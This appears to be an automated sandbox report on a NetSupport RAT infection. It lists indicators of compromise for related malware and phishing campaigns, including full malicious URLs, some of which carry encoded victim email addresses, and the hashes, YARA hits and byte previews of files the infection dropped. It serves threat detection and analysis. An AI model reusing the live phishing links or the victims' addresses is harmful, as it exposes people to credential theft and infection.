https://www.google.com/url?q=HTtPs%3A%2F%2Fd4in.biz%2FB%2Fy37wdgGc%2F&sa=D&sntz=1&usg=AOvVaw23mPMwVDo_hCPOwg36j5uM | malicious | GRQ Scam | 8.39.147.66
https://www.google.com/url?nm=50474786114&is=48890006478&q=HTtPS%3A%2F%2F5t0%2Eeu%2F%2FkzemIpal&sa=D&ow=93357825083&usg=AFQjCNFG2qeqRwQRyCL9KwlLye4amkHqXw | malicious | GRQ Scam | 8.39.147.66
https://www.google.com/url?q=htTPS%3A%2F%2F5t0%2Eeu%2F%2FM8r3Cpal&sa=D&ec=95051242740&xy=630753628150&lr=84642&usg=AFQjCNEaoXBGbdEApxUsZdyALpKRLW0ZbA | malicious | GRQ Scam | 8.39.147.66
https://bit.ly/3KifMRC | malicious | Unknown | 8.39.147.66
Qf3znUYo2b.dll | malicious | CobaltStrike | 8.39.147.87
Qf3znUYo2b.dll | malicious | CobaltStrike | 8.39.147.87
VtnLEsR9lB.exe | malicious | CobaltStrike | 8.39.147.87

Match: CLOUDFLARENETUS
Associated Sample Name / URL | Detection | Threat Name | Context
https://www.tiktok.com/////link/v2?aid=1988&lang=enitcl&scene=bio_url&target=google.com.////amp/s/%E2%80%8Breid%C2%ADopur%C2%ADificador%E2%80%8B.%E2%80%8Bc%C2%ADom.b%C2%ADr//////xone1/xdwvp/YWxhbi5yYW5kQGdjdWJlLWluc3VyYW5jZS5jb20=$%E3%80%82 | malicious | HTMLPhisher | 1.1.1.1
SecuriteInfo.com.BackDoor.AgentTeslaNET.34.20128.22369.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.97.3
https://www.tiktok.com/////link/v2?aid=1988&lang=enqiwk&scene=bio_url&target=google.com.////amp/s/%E2%80%8Breid%C2%ADopur%C2%ADificador%E2%80%8B.%E2%80%8Bc%C2%ADom.b%C2%ADr//////xone1/ljknb/dGhvbWFzLmhvZXNlQGFkdmFudC1iZWl0ZW4uY29t$%E3%80%82 | malicious | HTMLPhisher | 1.1.1.1
cmd.exe | malicious | Unknown | 104.21.82.93
https://www.tiktok.com/////link/v2?aid=1988&lang=enFSmPWg&scene=bio_url&target=google.com.////amp/s/%E2%80%8Bc%C2%ADt%C2%ADh%E2%80%8B.%C2%ADv%C2%ADn/.dev/JCE6X4BH/cnVzc2VsbEBhZGtjcmVkaXR1bmlvbi5jb20==$%E3%80%82 | malicious | HTMLPhisher, Tycoon2FA | 104.26.0.100
Invoice Request.scr.exe | malicious | AgentTesla | 104.26.12.205
https://www.tiktok.com/////link/v2?aid=1988&lang=enFSmPWg&scene=bio_url&target=google.com.////amp/s/cth.vn/.dev/JCE6X4BH/cnVzc2VsbEBhZGtjcmVkaXR1bmlvbi5jb20==$%E3%80%82 | malicious | HTMLPhisher, Tycoon2FA | 104.26.0.100
https://dev-childcareorverify.pantheonsite.io/?email=amy.matter.er@zylstrahd.com | malicious | HTMLPhisher | 172.67.74.59
Voicemail Transcription.(387.KB).html | malicious | HTMLPhisher | 104.22.50.98
inquiry#1523.exe | malicious | Snake Keylogger | 188.114.96.3
Match: 3b5074b1b5d032e5620f69f9f700ff0e
Associated Sample Name / URL | Detection | Threat Name | Context
SecuriteInfo.com.BackDoor.AgentTeslaNET.34.20128.22369.exe | malicious | Snake Keylogger, VIP Keylogger | 79.141.161.172
Invoice Request.scr.exe | malicious | AgentTesla | 79.141.161.172
rfq_final_product_purchase_order_import_list_10_09_2024_00000024.cmd | malicious | GuLoader, Remcos | 79.141.161.172
https://www.tiktok.com/////link/v2?aid=1988&lang=enFSmPWg&scene=bio_url&target=google.com.////amp/s/%E2%80%8Bva%C2%ADnd%C2%ADat%C2%ADco%E2%80%8B.%C2%ADv%C2%ADn/.dev/ChZuQF9L/bHlubi5wYXJzb25zQGltYWdvLmNvbW11bml0eQ===$%E3%80%82 | malicious | HTMLPhisher | 79.141.161.172
doc_Zapytanie - Oferta KH 09281.com.exe | malicious | Quasar | 79.141.161.172
https://go.skimresources.com/?id=129857X1600501&url=https://www.freelancer.com/users/login-quick.php?token=30b3628412ea618dcc3f414b266ae263302b3e1b43e6d2d885225319dabe8e68&url=https://secure.adnxs.com/seg?redir=https://link.sbstck.com/redirect/298cfa06-ad24-42db-8a85-7a3ca069b2cf?j=eyJ1IjoiNGRnZ2x2In0.IkG1h6SLHR3lrFyu | malicious | HTMLPhisher | 79.141.161.172
https://dl9r8y25t98wv.cloudfront.net/?YS50YW5ndXlAc2JtLm1j | malicious | Unknown | 79.141.161.172
MALED_Q88_10.09.24.doc.scr.exe | malicious | AgentTesla | 79.141.161.172
HelperLibrary.ps1 | malicious | Unknown | 79.141.161.172
Q88_MT Carol 2024.09.10.doc.scr.exe | malicious | AgentTesla | 79.141.161.172

Match: a0e9f5d64349fb13191bc781f81f42e1
Associated Sample Name / URL | Detection | Threat Name | Context
cmd.exe | malicious | Unknown | 8.39.147.104
https://www.tiktok.com/////link/v2?aid=1988&lang=enFSmPWg&scene=bio_url&target=google.com.////amp/s/%E2%80%8Bc%C2%ADt%C2%ADh%E2%80%8B.%C2%ADv%C2%ADn/.dev/JCE6X4BH/cnVzc2VsbEBhZGtjcmVkaXR1bmlvbi5jb20==$%E3%80%82 | malicious | HTMLPhisher, Tycoon2FA | 8.39.147.104
760l5F2ZjJ.exe | malicious | LummaC | 8.39.147.104
94dzpnhjR1.exe | malicious | LummaC | 8.39.147.104
760l5F2ZjJ.exe | malicious | LummaC | 8.39.147.104
94dzpnhjR1.exe | malicious | LummaC | 8.39.147.104
ow1qWm38w1.exe | malicious | LummaC | 8.39.147.104
jWKQJMmB86.exe | malicious | LummaC | 8.39.147.104
d4EtjTNPAr.exe | malicious | LummaC | 8.39.147.104
ow1qWm38w1.exe | malicious | LummaC | 8.39.147.104
Match: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\HTCTL32.DLL
Associated Sample Name / URL | Detection | Threat Name
update.js | malicious | NetSupport RAT
updates.js | malicious | NetSupport RAT
updates.js | malicious | NetSupport RAT
Update 124.0.6367.158.js | malicious | NetSupport RAT
updates.js | malicious | NetSupport RAT
Update 124.0.6367.158.js | malicious | NetSupport RAT
Update_124.0.6367.158.js | malicious | NetSupport RAT
MDE_File_Sample_c035ea05c53efc10b65ede03b5550188cbb2e484.zip | malicious | NetSupport RAT
update.js | malicious | NetSupport RAT
Update_122.0.616.js | malicious | NetSupport RAT

Match: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\PCICHEK.DLL
Associated Sample Name / URL | Detection | Threat Name
update.js | malicious | NetSupport RAT
updates.js | malicious | NetSupport RAT
updates.js | malicious | NetSupport RAT
Update 124.0.6367.158.js | malicious | NetSupport RAT
updates.js | malicious | NetSupport RAT
Update 124.0.6367.158.js | malicious | NetSupport RAT
Update_124.0.6367.158.js | malicious | NetSupport RAT
MDE_File_Sample_c035ea05c53efc10b65ede03b5550188cbb2e484.zip | malicious | NetSupport RAT
update.js | malicious | NetSupport RAT
Update_122.0.616.js | malicious | NetSupport RAT
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1310720
                                                                              Entropy (8bit):0.7263033904029493
                                                                              Encrypted:false
                                                                              SSDEEP:1536:9J8s6YR3pnhWKInznxTgScwXhCeEcrKYSZNmTHk4UQJ32aqGT46yAwFM5hA7yH0+:9JZj5MiKNnNhoxuH
                                                                              MD5:93E6A3E595855460E10A72458B030DCE
                                                                              SHA1:49F08CC6ECB4705DF3F7DE4012071737829A6817
                                                                              SHA-256:EBA0B93C6BE5C6D8AE5351AF7B1542DC945DFF80AAFB08D70D8D9C86DE4E679F
                                                                              SHA-512:55C3D35111CEB8729CADE4523321BD9994CE05003B238F548FFFAC3945E7B0488D37151A37826D4069C0D45180CBDD4AC24BDC21A2AAC9AA2DFE2DF57C87E203
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              Preview:...........@..@9....{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@....................................Fajaj.#.........`h.................h.......6.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:Extensible storage user DataBase, version 0x620, checksum 0x9570f4e0, page size 16384, DirtyShutdown, Windows version 10.0
                                                                              Category:dropped
                                                                              Size (bytes):1310720
                                                                              Entropy (8bit):0.7556297983600244
                                                                              Encrypted:false
                                                                              SSDEEP:1536:VSB2ESB2SSjlK/svFH03N9Jdt8lYkr3g16xj2UPkLk+kLWyrufTRryrUYc//kbxW:VazaSvGJzYj2UlmOlOL
                                                                              MD5:DB0DBAEFBA2C9F333A75241BF664B05A
                                                                              SHA1:91F0752FE9C590DA2D1707FC37A4169A6701C35B
                                                                              SHA-256:C504AE6054A046F0C3E20B34424C2CCFFC2557A4409FD2C353C166DE239098A3
                                                                              SHA-512:4AA6214B708C3A2FBE32DCE0B3A00D7A05EC30958EB26AC57803B104307B0AEADAB7C4A29710F712CE31A7BDA3E6A5E7A1ADE0391DE5CED6AD684B433D43CE21
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              Preview:.p..... .......7.......X\...;...{......................0.e......!...{?.."...|..h.g.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... .......9....{...............................................................................................................................................................................................2...{...................................d..."...|..................u.."...|...........................#......h.g.....................................................................................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):16384
                                                                              Entropy (8bit):0.07922460318656788
                                                                              Encrypted:false
                                                                              SSDEEP:3:jSXKYeXLD3rfNaAPaU1lZUlXalluxmO+l/SNxOf:jyKzXLXNDPaUh5gmOH
                                                                              MD5:EC3A7C6A11B83ED0297B887E852A6D5E
                                                                              SHA1:9CF305E164D244837DDBEBD55ADE450A8521B751
                                                                              SHA-256:0151490FEA985FF9ED4E08A1CE90D971923080868001C20784CCEDA82715B408
                                                                              SHA-512:BDF1D9E3560D58AA2617981723336647F63C35F18ABF868C6D664674E491A1C20BEA48149B871DA206066B6AD46ACB4AAFB0D0CF5761A1A8DDE7283D940B2130
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              Preview:........................................;...{..."...|...!...{?..........!...{?..!...{?..g...!...{?.................u.."...|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:modified
                                                                              Size (bytes):16
                                                                              Entropy (8bit):3.077819531114783
                                                                              Encrypted:false
                                                                              SSDEEP:3:llD:b
                                                                              MD5:C40449C13038365A3E45AB4D7F3C2F3E
                                                                              SHA1:CB0FC03A15D4DBCE7BA0A8C0A809D70F0BE6EB9B
                                                                              SHA-256:1A6B256A325EEE54C2A97F82263A35A9EC9BA4AF5D85CC03E791471FC3348073
                                                                              SHA-512:3F203E94B7668695F1B7A82BE01F43D082A8A5EB030FC296E0743027C78EAB96774AB8D3732AFE45A655585688FB9B60ED355AEE4A51A2379C545D9440DC974C
                                                                              Malicious:false
                                                                              Reputation:moderate, very likely benign file
                                                                              Preview:40.7357,-74.1724
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1524
                                                                              Entropy (8bit):5.3897992647355615
                                                                              Encrypted:false
                                                                              SSDEEP:24:3eNn4SKco4KmBs4RPT6BmFoUe7u1omjKcm9qr9t7J0gt/NKmNmwr8HJYBlD3RB+j:ONn4SU4y4RQmFoUeCamfm9qr9tK8Nfm3
                                                                              MD5:8093ED5A8BD161DBC783038513DB52C7
                                                                              SHA1:C3FD9CAC1FA5B642C8A0726C978AB8617C8306B0
                                                                              SHA-256:F79F5290CE1CD9FA2E512A1835CFFC07179BF4A8CD57F18EC039A78C1398BAA4
                                                                              SHA-512:CB4827675C4822593FED7E57DF1BF63CF9A1BF40343E7EEBD53B3A07E0D8FC722888522528BF006B6D9765710258398F7871BE4AB49C943A61A1FD6D574B1551
                                                                              Malicious:false
                                                                              Preview:@...e...........8.....................X..............@..........H...............x..}...@..."~.u....... .System.IO.Compression.FileSystemH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.................0..~.J.R...L........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Commands.Ut
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                              Category:dropped
                                                                              Size (bytes):2435615
                                                                              Entropy (8bit):7.9975270710717625
                                                                              Encrypted:true
                                                                              SSDEEP:49152:a51Zl4lEDThXBJOhHvh6J6h2SFFGf0RBNTQfYc9jh23eWeB3/YSBm7WIqRRakTSU:E15FXa/hRFY89YYc9jh23redpmQROe
                                                                              MD5:C02C379AC353594F487B91AE840DC635
                                                                              SHA1:215FAF9E51AEF87FE8BA456C107AB2C8CC1900D2
                                                                              SHA-256:1EBB8AF9F86B32FB9CC3AADE92EC4AD4426207F49009236D7CF88990CF7F79E5
                                                                              SHA-512:65EC9B57608D1C456CD788302CFA64F8085004BDB72AF38B4B1EDAA1D694D919617A9F0430DE61EE0D649AACE52E506DD2498D040FA140CF7AADFB3ED9247EF9
                                                                              Malicious:false
                                                                              Preview:PK.........DWW..%.&l..........client32.exe.|.xT.....N..".R....A.W..@........Tj.$...Q.@... ...7!...@..iJ.......;3....R..~.....;g...3gfnx...T.@......b../....d.@...n{...ts....5d.....]%.i..v...:3lZ..i]G.9v.:...\__...F.).C....(..B..t..P.f....&..9..e.k9.:.K.X...8..`.@...Oph.@W...B.p....N.]A.....A^...!..Y..T...+..t........`..KUg.....`..]w..=k...g...7.......4<..=f..|..8T.."...z..:..ae>s.L.(....f.U.%=.).Iq.....T..px-..8G.G...`8.>{#.=....&B..G..)t........uY:R0..C.....C.........G......1r.e..K5HMop..ZJ..6.&...fM.........m....G..W.I0....hb.."NDS5...>MTz-.".i.....v..[..JC.dC........^4....4.W.U.SZ.'..........O...C.O.+..X...Cs.)S.L`3'8t.....Y..Te....~aS.G...M......9..g......0}.|-.;..N%....Hi......$.....kC..t..`..,..!&..X..$.6k..v....o_.I.......x......?_..'.A..../`S.b...u.].....t..9.6...g.l..|.2...Nte.}.N....]........)d..Q{.>g.p?G.O...g.......S.Z*.-.....^.......[......V..i...V.oh.~l+......R9.}W.F..q....4...._`G.CK..u.@l.....7l.W/..b.&... H.1..I.........
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):328056
                                                                              Entropy (8bit):6.7547459359511395
                                                                              Encrypted:false
                                                                              SSDEEP:6144:Hib5YbsXPKXd6ppGpwpbGf30IVFpSzyaHx3/4aY5dUilQpAf84lH0JYBAnM1OKB:Hib5YbsXioEgULFpSzya9/lY5SilQCfR
                                                                              MD5:C94005D2DCD2A54E40510344E0BB9435
                                                                              SHA1:55B4A1620C5D0113811242C20BD9870A1E31D542
                                                                              SHA-256:3C072532BF7674D0C5154D4D22A9D9C0173530C0D00F69911CDBC2552175D899
                                                                              SHA-512:2E6F673864A54B1DCAD9532EF9B18A9C45C0844F1F53E699FADE2F41E43FA5CBC9B8E45E6F37B95F84CF6935A96FBA2950EE3E0E9542809FD288FEFBA34DDD6A
                                                                              Malicious:true
                                                                              Yara Hits:
                                                                              • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\HTCTL32.DLL, Author: Joe Security
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 13%
                                                                              Joe Sandbox View:
                                                                              • Filename: update.js, Detection: malicious
                                                                              • Filename: updates.js, Detection: malicious
                                                                              • Filename: updates.js, Detection: malicious
                                                                              • Filename: Update 124.0.6367.158.js, Detection: malicious
                                                                              • Filename: updates.js, Detection: malicious
                                                                              • Filename: Update 124.0.6367.158.js, Detection: malicious
                                                                              • Filename: Update_124.0.6367.158.js, Detection: malicious
                                                                              • Filename: MDE_File_Sample_c035ea05c53efc10b65ede03b5550188cbb2e484.zip, Detection: malicious
                                                                              • Filename: update.js, Detection: malicious
                                                                              • Filename: Update_122.0.616.js, Detection: malicious
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ ...A...A...A.......A...9...A...A..gA....1..A....0.A.......A.......A.......A..Rich.A..........PE..L.....V...........!.................Z.......................................P......._....@......................... ...k....y..x.......@...............x).......0..................................._..@............................................text............................... ..`.rdata..............................@..@.data....f.......(...v..............@....rsrc...@...........................@..@.reloc..b1.......2..................@..B........................................................................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:PNG image data, 600 x 600, 8-bit/color RGBA, non-interlaced
                                                                              Category:dropped
                                                                              Size (bytes):24504
                                                                              Entropy (8bit):7.872865717955356
                                                                              Encrypted:false
                                                                              SSDEEP:384:qSVmAf6Ft8Itb+e2b9tdTwEy9kXs6vWZZCbiXSeEO/12Hb40yrWSbN8qtA:qImAfe7gx3y6MZC2CeV2747zbN8
                                                                              MD5:B8F553FBD3DC34B58BC77A705711023D
                                                                              SHA1:4AB1052F906FDA96F877E398426DA5646574C878
                                                                              SHA-256:2761C60263A2919B856915BDD2A0604B7F0E56E59D893AB13CCCEF2B7C967229
                                                                              SHA-512:15A1DF0DBB06B4BB64A2B8CD7AD22578292D5ECDEC64303350E027F9F87FA8A825CB1CC97F94862D8C235C85B0C79A4FEABFB89D9E0B77BE62AAB25785122A60
                                                                              Malicious:false
                                                                              Preview:.PNG........IHDR...X...X......f...._.IDATx........................................................................................................................................................................................................................................................f...:.(L..A!..].'twW..3.2 ..........'k.]Kd.|...mz..U...Tu.L..~.W.Wc......................rv.iv%.q=....u..>.o.......k.y.wo........ .,...~..U..._.7/g.........m.....*w.`........p.....8...q.,.,.g....:Q.Rt....Ga.............Z..S+.....=.,....T.Ew.....0U..`.....S.......w....Va..#.|Mo.....eY.eY....m^....r.P..S{#......D.I.y..K.&&9....@...u.^...D.....U..l.keY.eY....rv.]..H..A....^..RpQ.)@,.Im..s.~.U.....,j....._m?.V...z95l}.,.,.P....b..R.>rV.Q_m.0....(.b..@.,./.T[.S;.X....`..w.,...j.o..M.......~^......0.8.....$][=`.V.)..O..1....+...3...eY.e.[.]....s...z.E\.I!G..;).'...d.m>..+w.M.=X.S......g.o.~0........j.{.hY.eY.7.................G..e(K...y..IL.F)g..{.....Z.J}...qn..+.%
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):195
                                                                              Entropy (8bit):4.924914741174998
                                                                              Encrypted:false
                                                                              SSDEEP:6:O/oPITDKHMoEEjLgpVUK+Odfu2M0M+ZYpPM/iotqO2La8l6i7s:XAyJjjqVUKHdW2MdRPM/iotq08l6J
                                                                              MD5:E9609072DE9C29DC1963BE208948BA44
                                                                              SHA1:03BBE27D0D1BA651FF43363587D3D6D2E170060F
                                                                              SHA-256:DC6A52AD6D637EB407CC060E98DFEEDCCA1167E7F62688FB1C18580DD1D05747
                                                                              SHA-512:F0E26AA63B0C7F1B31074B9D6EEF88D0CFBC467F86B12205CB539A45B0352E77CE2F99F29BAEAB58960A197714E72289744143BA17975699D058FE75D978DFD0
                                                                              Malicious:true
                                                                              Preview:1200..0x3ca968c5....[[Enforce]]....[_License]..control_only=0..expiry=01/01/2028..inactive=0..licensee=XMLCTL..maxslaves=9999..os2=1..product=10..serial_no=NSM303008..shrink_wrap=0..transport=0..
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:Generic INItialization configuration [Features]
                                                                              Category:dropped
                                                                              Size (bytes):6458
                                                                              Entropy (8bit):4.645519507940197
                                                                              Encrypted:false
                                                                              SSDEEP:96:B6pfGAtXOdwpEKyhuSY92fihuUhENXh8o3IFhucOi49VLO9kNVnkOeafhuK7cwo4:BnwpwYFuy6/njroYbe3j1vlS
                                                                              MD5:88B1DAB8F4FD1AE879685995C90BD902
                                                                              SHA1:3D23FB4036DC17FA4BEE27E3E2A56FF49BEED59D
                                                                              SHA-256:60FE386112AD51F40A1EE9E1B15ECA802CED174D7055341C491DEE06780B3F92
                                                                              SHA-512:4EA2C20991189FE1D6D5C700603C038406303CCA594577DDCBC16AB9A7915CB4D4AA9E53093747DB164F068A7BA0F568424BC8CB7682F1A3FB17E4C9EC01F047
                                                                              Malicious:false
                                                                              Preview:..[General]..ClientParams=..CLIENT32=..Installdir=..NOARP=..SuppressAudio=......[Features]..Client=1..Configurator=..Control=..Gateway=..PINServer=..RemoteDeploy=..Scripting=..Student=..TechConsole=..Tutor=......[StartMenuIcons]..ClientIcon=..ConfigIcon=..ControlIcon=..RemoteDeployIcon=..ScriptingIcon=..TechConsoleIcon=..TutorIcon=......[DesktopIcons]..ControlDeskIcon=..TechConsoleDeskIcon=..TutorDeskIcon=............; This NSM.ini file can be used to customise the component selections when performing a silent installation of the product.....; Client=<1/Blank>..; e.g...; Client=1..; Controls whether the client component is installed (1) on the target machine or not (Blank)..;....; CLIENT32=<blank/not blank>..; e.g...;. CLIENT32=..;. Setting this to anything causes the Client Service (if installed) to be set to manual start rather than automatic..;....; ClientIcon=<1/Blank>..; e.g...; ClientIcon=1..; Controls whether shortcut icons are placed on t
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):18808
                                                                              Entropy (8bit):6.292094060787929
                                                                              Encrypted:false
                                                                              SSDEEP:192:dogL7bo2t6n76RRHirmH/L7jtd3hfwjKd3hfwB7bjuZRvI:dogL7bo2YrmRTAKT0iTI
                                                                              MD5:104B30FEF04433A2D2FD1D5F99F179FE
                                                                              SHA1:ECB08E224A2F2772D1E53675BEDC4B2C50485A41
                                                                              SHA-256:956B9FA960F913CCE3137089C601F3C64CC24C54614B02BBA62ABB9610A985DD
                                                                              SHA-512:5EFCAA8C58813C3A0A6026CD7F3B34AD4FB043FD2D458DB2E914429BE2B819F1AC74E2D35E4439601CF0CB50FCDCAFDCF868DA328EAAEEC15B0A4A6B8B2C218F
                                                                              Malicious:true
                                                                              Yara Hits:
                                                                              • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\PCICHEK.DLL, Author: Joe Security
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 5%
                                                                              Joe Sandbox View:
                                                                              • Filename: update.js, Detection: malicious
                                                                              • Filename: updates.js, Detection: malicious
                                                                              • Filename: updates.js, Detection: malicious
                                                                              • Filename: Update 124.0.6367.158.js, Detection: malicious
                                                                              • Filename: updates.js, Detection: malicious
                                                                              • Filename: Update 124.0.6367.158.js, Detection: malicious
                                                                              • Filename: Update_124.0.6367.158.js, Detection: malicious
                                                                              • Filename: MDE_File_Sample_c035ea05c53efc10b65ede03b5550188cbb2e484.zip, Detection: malicious
                                                                              • Filename: update.js, Detection: malicious
                                                                              • Filename: Update_122.0.616.js, Detection: malicious
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Yu....i...i...i.......i..Z...i.......i......i......i..l....i...h.~.i......i......i......i.......i.Rich..i.................PE..L....A.W...........!......................... ...............................`.......U....@.........................@#..r...h!..P....@............... ..x)...P......P ............................... ..@............ ..D............................text............................... ..`.rdata....... ......................@..@.data........0......................@....rsrc........@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):3740024
                                                                              Entropy (8bit):6.527276298837004
                                                                              Encrypted:false
                                                                              SSDEEP:49152:0KJKmPEYIPqxYdoF4OSvxmX3+m7OTqupa7HclSpTAyFMJa:0KJ/zIPq7F4fmXO8u6kS+y/
                                                                              MD5:D3D39180E85700F72AAAE25E40C125FF
                                                                              SHA1:F3404EF6322F5C6E7862B507D05B8F4B7F1C7D15
                                                                              SHA-256:38684ADB2183BF320EB308A96CDBDE8D1D56740166C3E2596161F42A40FA32D5
                                                                              SHA-512:471AC150E93A182D135E5483D6B1492F08A49F5CCAB420732B87210F2188BE1577CEAAEE4CE162A7ACCEFF5C17CDD08DC51B1904228275F6BBDE18022EC79D2F
                                                                              Malicious:true
                                                                              Yara Hits:
                                                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\PCICL32.DLL, Author: Joe Security
                                                                              • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\PCICL32.DLL, Author: Joe Security
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 17%
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........J.>N+.mN+.mN+.m.eAmL+.mU.Gmd+.m!]rmF+.mU.EmJ+.mGSZmA+.mGS]mO+.mGSJmi+.mN+.m.(.mU.rm.+.mU.sm.+.mU.BmO+.mU.CmO+.mU.DmO+.mRichN+.m........................PE..L......X...........!.....(...$ .............@................................9.....Y.9.............................p................p................8.x)...`7.p....Q.......................c......@c..@............@..(.......`....................text...l'.......(.................. ..`.rdata..s....@.......,..............@..@.data....%... ......................@....tls.........P......................@....hhshare.....`......................@....rsrc........p......................@..@.reloc...3...`7..4....6.............@..B................................................................................................................................................................................................
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):535135
                                                                              Entropy (8bit):5.344978632661496
                                                                              Encrypted:false
                                                                              SSDEEP:3072:ULe8wUVX1DapjhDo9W0j1PNriQ3ofpDYl9ifmIZ1IF6ox4me5NJ5/VsJyYj44lg/:ge8L4ju9knpDYJIhoimI5NsLM4nXm62
                                                                              MD5:9557C1A015818BE52C9F7FF44F56915B
                                                                              SHA1:84282F2AAE2ADB03F4EE0450329F038E8E6F8DF3
                                                                              SHA-256:4A2D8A1A2169C380F1609A72F4111CF014ACE8B2CBB916E77668D9529B50E133
                                                                              SHA-512:8DDB6C6FED33D477D9FD07BD672F2962C5277C2CC0A8B1656D59822D1E285E853DFB70E2554F71AD481F766AE6EB6BEC17EA42E1C0716C9F01DC9E2547983066
                                                                              Malicious:false
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):396664
                                                                              Entropy (8bit):6.80911343409989
                                                                              Encrypted:false
